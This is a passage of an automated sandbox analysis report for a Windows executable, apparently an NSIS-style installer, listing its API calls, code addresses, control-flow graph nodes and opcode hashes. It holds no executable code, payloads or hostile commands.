                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                        • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                        • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                        • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 618 401ba0-401bab 619 401bf1-401bf4 618->619 620 401bad-401bb0 618->620 623 401bf6-401bf8 619->623 624 401c1b-401c31 GlobalAlloc call 406594 619->624 621 401bb6-401bba 620->621 622 40238f-4023a7 call 406594 call 405bb7 620->622 621->620 627 401bbc-401bbe 621->627 633 402c2f-402c38 622->633 641 402c3a-402c3e 622->641 628 402933-40293a 623->628 629 401bfe-401c16 call 406557 GlobalFree 623->629 631 401c36-401c43 624->631 627->622 632 401bc4-402a9e call 406557 * 3 627->632 628->633 629->633 631->622 631->633 632->633 633->641
                                        APIs
                                        • GlobalFree.KERNEL32(0080F230), ref: 00401C10
                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Del
                                        • API String ID: 3394109436-3562819231
                                        • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                        • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                        • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                        • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 648 4025a3-4025bf call 402deb call 402d89 653 402933-40293a 648->653 654 4025c5-4025d0 648->654 657 402c2f-402c3e 653->657 655 4025d2-4025dc RegEnumKeyW 654->655 656 4025de-4025f1 RegEnumValueW 654->656 658 4025fa-402608 RegCloseKey 655->658 656->658 659 4025f3 656->659 658->653 658->657 659->658
                                        APIs
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                        • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                        • Opcode Fuzzy Hash: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                        • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                        APIs
                                          • Part of subcall function 00406022: GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                          • Part of subcall function 00406022: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040603B
                                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DFD), ref: 00405C36
                                        • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DFD), ref: 00405C3E
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                        • String ID:
                                        • API String ID: 1655745494-0
                                        • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                        • Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
                                        • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                        • Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                        • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                        • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                        • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                        • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • GetLastError.KERNEL32 ref: 00405AFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3712363035-0
                                        • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                        • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                          • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                          • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                          • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040603B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                        • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\, xrefs: 00403B6E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\
                                        • API String ID: 2962429428-3755816549
                                        • Opcode ID: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
                                        • Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
                                        • Opcode Fuzzy Hash: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
                                        • Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
